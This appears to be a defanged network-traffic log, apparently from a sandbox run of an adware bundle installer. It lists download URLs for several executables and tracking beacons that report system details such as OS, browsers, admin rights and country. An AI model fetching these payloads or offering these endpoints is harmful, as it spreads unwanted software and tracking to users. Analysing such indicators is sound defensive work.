hxxp://xa.xingcloud.com/v4/searchprotect/267123711_198339_B48A115F?action=visit.heartbeat.smt&update0=ref,smt&update1=nation,us&update2=language,en&update3=version,4.0.1.2105 65.255.35.143
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1429400195
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=10000&n=deploy_end_funnel_step_name&rnd=1429400195
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=_ffDll_0&app=65743&appver=&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_43&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350029&asw=0&asw2=1082139141&asw3=-2147475456&asw4=34816&crtnm=na&procstarttime=1429400187&procruntime=10&rnd=1429400197
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=65743&appver=&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1429400187&lifetime=0&silent=1&crtnm=na&procstarttime=1429400187&procruntime=10&rnd=1429400197
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=4&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400187&asw=0_1082139141_-2147475456_34816&browser=ff&rnd=1429400187
hxxp://bigspeedpro.com/webplayer/appshat/config.json
hxxp://appshat.com/images/64x64.ico
hxxp://appshat.com/images/16x16.ico
hxxp://appshat.com/home
hxxp://appshat.com/css/main.css
hxxp://appshat.com/css/product.css
hxxp://appshat.com/css/style.css
hxxp://googleapis.l.google.com/ajax/libs/jquery/1.7.2/jquery.min.js
hxxp://googleapis.l.google.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js
hxxp://appshat.com/css/lightbox.css
hxxp://appshat.com/js/scripts.js
hxxp://googleadapis.l.google.com/css?family=Abel
hxxp://appshat.com/js/jquery.smooth-scroll.min.js
hxxp://appshat.com/js/lightbox.js
hxxp://appshat.com/images/logo.jpg
hxxp://appshat.com/thumbnails/banner/images/assets/1/3/13a052a6d8c62b7831aa10e2f6f37454.jpg
hxxp://appshat.com/thumbnails/banner/images/assets/7/f/7fb9f4ca0fa96299334c18ee76c7b68b.jpg
hxxp://appshat.com/thumbnails/banner/images/assets/3/6/365640f122ef96f033f2f87c6308031e.png
hxxp://ssl.gstatic.com/s/abel/v6/3YEwT2a1878zysq92S8_9w.eot 216.58.209.195
hxxp://clients.l.google.com/analytics.js
hxxp://appshat.com/thumbnails/banner/images/assets/1/f/1f8ffa22b53dfc2f6b7f1850bb6b73e8.png
hxxp://clients.l.google.com/r/collect?v=1&_v=j35&a=1886521082&t=pageview&_s=1&dl=http://www.appshat.com/home&ul=en-us&de=utf-8&dt=Apps Hat&sd=32-bit&sr=1716x901&vp=1018x770&je=0&_u=AEAAAAAAI~&jid=2102561798&cid=1223026756.1429400200&tid=UA-42656881-1&_r=1&z=866469168
hxxp://appshat.com/images/4.5stars.jpg
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=install_complete&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=appshat_madness&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=4&index_in_screen=1&index_in_session=4&0.36330831864320045
hxxp://appshat.com/thumbnails/icon/images/assets/0/7/07fce0a4ff78cc7e6376e227f046ce06.png
hxxp://appshat.com/images/5.0stars.jpg
hxxp://appshat.com/thumbnails/icon/images/assets/f/4/f4e4b853ddab3b763f0af17d513631bd.png
hxxp://appshat.com/thumbnails/icon/images/assets/6/a/6a12dc1a298e870b610a58a56ba0f5ec.jpg
hxxp://appshat.com/images/3.0stars.jpg
hxxp://appshat.com/thumbnails/icon/images/assets/e/5/e54e8c720dffffa619c3b0eacec9381a.png
hxxp://appshat.com/thumbnails/icon/images/assets/5/d/5dbc29649669598ff43174b9ee730008.png
hxxp://appshat.com/thumbnails/icon/images/assets/8/3/83a4cee7a59522b93ed0ae1fa73ce8f3.png
hxxp://appshat.com/thumbnails/icon/images/assets/5/8/589b1e936e1f038dc45bd8ffff59b359.png
hxxp://appshat.com/thumbnails/icon/images/assets/2/3/23428f8768d928d2bd45dd3b0c4d0057.png
hxxp://appshat.com/thumbnails/icon/images/assets/f/1/f1ed3cd0cae7a3524376e6f9369c7ab8.png
hxxp://appshat.com/thumbnails/icon/images/assets/b/b/bbbde9554589bda63791709a6785e0a3.png
hxxp://appshat.com/images/4.0stars.jpg
hxxp://appshat.com/thumbnails/icon/images/assets/5/2/52d5414e7372639389ab7e9e4d479aee.png
hxxp://appshat.com/thumbnails/icon/images/assets/3/d/3d8bbea6bcae57d705c676f7050a7d51.png
hxxp://appshat.com/thumbnails/icon/images/assets/7/c/7c9d412c730603d1d82b98a548a71bac.png
hxxp://appshat.com/thumbnails/icon/images/assets/a/c/ac5196fbf245580eee113296dff14d0b.png
hxxp://appshat.com/images/3.5stars.jpg
hxxp://appshat.com/thumbnails/icon/images/assets/1/3/13ca8e322e15bc394d66a37bec12e3b4.png
hxxp://appshat.com/thumbnails/icon/images/assets/f/3/f3ad8b396434c21b4c214fd667ee391d.png
hxxp://appshat.com/thumbnails/icon/images/assets/d/a/da84c206c2019448521379d2ff837774.png
hxxp://appshat.com/thumbnails/icon/images/assets/4/4/442a5f30204dd385d17de5848683274f.png
hxxp://online.goobzo.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=1&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=20131113143800&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&XMLUpdateFailed=0&ElapsedTime=1429400201&SBPIDS=1 212.143.22.213
hxxp://appshat.com/thumbnails/icon/images/assets/5/9/59982d8527c0da41e35817e8fc15c0fc.png
hxxp://appshat.com/thumbnails/icon/images/assets/7/e/7e5817bad781bbc2d2e43b350ccb53db.png
hxxp://appshat.com/thumbnails/icon/images/assets/d/d/ddb3b88cf98eb0220c9e6c252e376749.png
hxxp://appshat.com/images/bg_main.jpg
hxxp://www.theviilage.com/windowspm/up?ptid=wpmvt&sid=WindowsMangerProtect&ln=en_us&ver=20.0.0.1953&uid=&upv= 208.43.69.149
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?4124f9eb17acfe32
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4f0b436e9b257d53
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEBILJd3le4hjatTZfSO5nIg=
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s= 178.255.83.1
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2+iPob4twryIF+FfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa/LgCEBBwnU/1VAjXMGAB2OqRdbs= 178.255.83.1
hxxp://ocsp.usertrust.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDmFsbNcBDBl+cij2b1soa7 178.255.83.1
hxxp://a1363.dscg.akamai.net/pki/crl/products/microsoftrootcert.crl
hxxp://a1363.dscg.akamai.net/pki/crl/products/WinPCA.crl
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicrosoftTimeStampPCA.crl
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?0eef9989179d6dc8
hxxp://crl.globalsign.net/root-r3.crl 108.162.232.200
hxxp://crl.globalsign.net/gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhZyg35kUM7JUe4UHDT5+Nwg== 108.162.232.200
hxxp://crl.globalsign.net/root.crl 108.162.232.200
hxxp://crl.globalsign.net/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhZ1N/ArcYWNWqP8XWy7QmXA== 108.162.232.200
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECECVRccvD8Qb29B4D63fPT+k=
hxxp://www.theviilage.com/searchprotect/up?ptid=smt&sid=IHProtectPlugin&ln=en_us&ver=4.0.1.2105&uid=267123711_198339_B48A115F&dp=0 208.43.69.149
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicCodSigPCA_08-31-2010.crl
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo=
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1429400191 54.231.1.140
hxxp://install-cdn.theswiftrecord.com/sd?is=sm 87.245.216.96
hxxp://rep.shopper-pro.com/app/ping.ashx?e=obiBp3WOda WjDTOqhvSEb0oSfJOuBg0ZkAbtSTrnD/ZhN5o5pkk8XKxIhAz9YyqMSx1JGlNOutOeXK1HgKvEMUWbVgwixNWcSwZ6/LEwZLppMdrwPpmw4FF6f/a06pCWjwfqp7MHxGpMWXGXOfhUiXwmSZn9bL3CkMpf9re0fn3iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22ORm1WAVEoCJveNGyFHqLUA65EYBtUaaJ2Vte0h/YpXnsUyuixSI4KbCwH m 6Vr7WDk4k9vngPPGpq73FZdDH/8= 54.197.238.106
hxxp://8vcyzxssv-457zol7j.netdna-ssl.com/yta33_full.exe 198.232.124.192
hxxp://www.appshat.com/images/4.0stars.jpg 78.138.127.8
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=200&n=init_end_funnel_step_name&rnd=1429400190 54.231.1.140
hxxp://rephelper.youtubeaccelerator.com/app/ping.ashx?e=uWabAt9SLcwd5zMhdw4gNv3K4Um6afGy2rWxJ8ENzMu9gdZ7vVVoir9hXn5fpF0AWcMhU uLDRW9bNt46T8oebkv4QX1tDHZYCpHZc9ZUaG9AEuBwweR31o8H6qezB8RqTFlxlzn4VIl8JkmZ/Wy9wpDKX/a3tH594khRQjb0om5r9iFtppC1uEsoMnuAcfjiugW2mv9tjkZtVgFRKAib0rRptMshTXZhki2VnUOF/T8SaNRCRsmEQLMEicbqKjXDxJ w6ryxW8=
hxxp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0 54.192.47.181
hxxp://www.appshat.com/images/logo.jpg 78.138.127.8
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1429400194 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=800&n=deploy_nova_start_funnel_step_name&rnd=1429400154 54.231.1.140
hxxp://dl.newinputinfoservice.com/smt2b/all/hat/row/setup.exe 69.16.175.42
hxxp://dl.ourinputinfonet.com/spd/shopp/sense9.exe 69.16.175.42
hxxp://www.appshat.com/images/64x64.ico 78.138.127.8
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=700&n=deploy_ch_start_funnel_step_name&rnd=1429400154 54.231.1.140
hxxp://logs.neomapobjectrack.com/monetization.gif?event=3&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400187&asw=0_1082139141_-2147475456_34816&browser=ff&rnd=1429400187 69.16.175.42
hxxp://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js 216.58.209.202
hxxp://rep.shopper-pro.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBpQ6ZdlmdsYCbUPmaXNWlX6cOBv59w3XV3YMennWKpognh1HGq AP1KrMrg41l/Ly7CST5Ycto3cE6nMAQ0x67lxVrNxtz1yEbBRuaRLHbXnTUEr/6e1TisbrbAZflc27 ln nOmsXLiGMaGZpy/Ub67iSCXfI0 nk7xKwR3W9AY9/CpuCTIAF0= 54.197.238.106
hxxp://wt94bf4ec-g48pastf.netdna-ssl.com/install.ashx?e=lOCrbsNL2zWQ5lb rGZVAri3muUffR3jKmDaOTMoLIjoUht0DV8eHWD3h9gcT/r2iwEbfeVtNep9AGHLpPN9dvm9MH d93Mvga zuhV9q9Hxu1y 6Ac0RKhN6psLdnSsdosECI4dMRD6OfU8/FMPXH6dYg1rlTgUy/ecrRsbq5tpfYOBgM/eiVGOPVXIjHvBpTJ2ibhTIXvL Evyupn5FoSAG857z6vSJoFp5BSgEe3Or7WZbrDrQA0K6wxeD7aRji4XER0T3SsRjhY3fDkRrbFQmXPNpoklPLuavJrfzx3SY2lnXaqmudis9e3mVlqWe/fAkvYFtt65Nw1wKmcLnW1QjAzn1XLpcMPDO l3UUtc7JTfzqJuQ2xNoUmVdbK77K3bmITDI9vVQ7t2OrbhY5/k5hJWQvF3XVs6Y tAG2M= 198.232.124.192
hxxp://8jxn8tdj-su78sj1t.netdna-ssl.com/ShopperProJSINJFull.exe 198.232.124.192
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=500&n=deploy_notification_start_funnel_step_name&rnd=1429400153 54.231.1.140
hxxp://stats.neomapobjectrack.com/installer.gif?action=started&app=70121&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_32&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&mdat=&procstarttime=1429400147&procruntime=3&rnd=1429400150 54.231.17.116
hxxp://install.theswiftrecord.com/fp?alpha=J3csDhl8ezg9DQ4BAyQWJjN/AxknKzp/WAB2bRFFIGMhDl8lBl58ASI2QnlIZmQoXRQ6BTMPLyYADCYLP1Mje21PdmZmGnEjOR0PAiNXAwZkdi9CRzBve3ocWRksTAwiI20aHXcNJXF1IDAwFUt9ZCFaZiYJQghGOnF9UBlwYQ4DCTQyP1BKay48G0gPZ1wxCzdsOlYXIXpwYhlZCSpJGCMvYB8bYgx5aHMnJTcBWHpiOQ00N1UWGglmfB0KUHd8CUZ/LSA9SkEpd2VcFQ40Shx/EX14HRE8cHlzGFEfLk4TcGUsFXsrVXgnMGYlRF0eLj99DidJTUEFWD92f2gZZ2cJWmI7cmhjGwIuPBZEUn4ofR9gayJCRzh1fm8eJB0sSwwgJQZpaAZWGRk2WiUI 8.34.112.140
hxxp://www.appshat.com/thumbnails/icon/images/assets/f/3/f3ad8b396434c21b4c214fd667ee391d.png 78.138.127.8
hxxp://errors.neomapobjectrack.com/installer-error.gif?action=sesamy&app=70121&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&error=0&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=3&rnd=1429400150 54.231.1.140
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= 23.51.123.27
hxxp://sub.goveba.info/pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=appshat_madness&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=4&index_in_screen=1&index_in_session=4&0.224164603995264 54.192.47.181
hxxp://stats.neomapobjectrack.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_36&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&mdat=&procstarttime=1429400147&procruntime=3&rnd=1429400150 54.231.17.116
hxxp://dl.ourinputinfonet.com/spd/shopp/iweb.exe 69.16.175.42
hxxp://repjs.shopper-pro.com/app/ping.ashx?e=c0XmKevqA0n9yuFJumnxsiS DXErth A 0R MP RL3VKgFoRkIu6RpNh8S9i4d0Hnb22gmYS8RsDllQ9J4QRpkb2k6Rn898YXCSgtUXqN5/aaUzToxOfiz0mbos5SmUuL1RonSUM0G8HF9ed47qLJdLkq GrncHeyXBDP8Ld0 yRF51HAH62ECVvD8H/vspbe9//dIyd3GGG7NLJhlXAptjP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5Bjt6DgsNnxOwUbmkSx2157mT/v0ajD3y 54.197.238.106
hxxp://www.appshat.com/thumbnails/icon/images/assets/e/5/e54e8c720dffffa619c3b0eacec9381a.png 78.138.127.8
hxxp://rep.shopper-pro.com/app/ping.ashx?e=2v0SNuZrMFxLlRAfuGRpD SrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBiYH9jylicula50u3XyigpVREcH6lvzpS5NOnjhl29VMiawHEBbFjHDiLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmvDlvHUGzrBfE5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpRK5JbDp8Lfwsf PLwbgUYljhKIPjTcuiw= 54.197.238.106
hxxp://sub.goveba.info/pinger?event_type=install_complete&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=youtubeaccelerator&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=1&index_in_screen=1&index_in_session=1&0.7744544824062006 54.192.47.181
hxxp://wt94bf4ec-g48pastf.netdna-ssl.com/install.ashx?e=hWfaA75NtHH85nz5m58wW/3K4Um6afGyh/JbJ35jG8NZxrddMpcl9iuIlCBhM10qy/hL8rqZ RaEgBvOe8 r0o/iiYZxylfDjKjHf0fty0gJvLuonclT9KsmG/QcpI3t8jaU320NFtWR2G31gFuf02hbuYqdnYR4elHMzi3I9ndbsUN4BYD1D8brniShQ3GQtRzip5AcKg4rWxcpBkHhSQ3kCpSb73om1nmEvUc rydewhrFWYF5Tv0qJ78sIh84amSSgMHjLmQAkaiKC91AannFaQMUFf3agVhnL6oJP/krWxcpBkHhSQ3kCpSb73om1nmEvUc ryfLtaw9zNAybItGWMfwQWPTSZrRYQUgrCCNPc8M0MF2aRqGwFt9gDlur0z2m5iDPRGLrldSVYX6DDrXuhDjTe7cjgNUdiNhvarEQZWzelk5mfjLSd7YlIFWg0zysAorDwLYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW ax5eone962kYdPT9nrlrOwzThv/VXsFFUkiD//SLljTIUUNPzNqpdQ IQcLyoqcrddz3lZB7h1Z 198.232.124.192
hxxp://sub.goveba.info/pinger?event_type=install_complete&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=istartsurf&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=3&index_in_screen=1&index_in_session=3&0.6547741639866222 54.192.47.181
hxxp://errors.neomapobjectrack.com/installer-error.gif?action=sesamy&app=65743&appver=0&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&error=0&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350029&asw=0&asw2=1082139141&asw3=-2147475456&asw4=34816&crtnm=na&procstarttime=1429400187&procruntime=2&rnd=1429400189 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1429400161 54.231.1.140
hxxp://www.bigspeedpro.com/webplayer/appshat/config.json 212.7.199.181
hxxp://www.appshat.com/images/bg_main.jpg 78.138.127.8
hxxp://rep.shopper-pro.com/app/ping.ashx?e=blUJ6JGwk9K9KEnyTrgYNCez9wwAvCDA2YTeaOaZJPFysSIQM/WMqjEsdSRpTTrrTnlytR4CrxDFFm1YMIsTVnEsGevyxMGS6aTHa8D6ZsN7HEv67ptHclD/oBpUX5crnl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2fYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW fNsA1iuxLaBL/OoH7S3dfV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkcGnzYs 4vlFyjca/6c/zCZgGUqUYly4OA= 54.197.238.106
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?0eef9989179d6dc8 87.245.216.25
hxxp://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDmFsbNcBDBl+cij2b1soa7 178.255.83.1
hxxp://www.appshat.com/thumbnails/icon/images/assets/2/3/23428f8768d928d2bd45dd3b0c4d0057.png 78.138.127.8
hxxp://www.appshat.com/images/16x16.ico 78.138.127.8
hxxp://rep.shopper-pro.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBq2mie6K97bhs4164GCUCrHY6 CMJNDnNVJ80QsygdrlOPofYEioTNmxiezSykY/Z9jP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb582wDWK7EtoEv86gftLd19X1D9868HonIj9NWOW5Z1BfUQsLxVIQuRwafNiz7i UXVi33qPwefc AZSpRiXLg4A== 54.197.238.106
hxxp://www.appshat.com/thumbnails/icon/images/assets/a/c/ac5196fbf245580eee113296dff14d0b.png 78.138.127.8
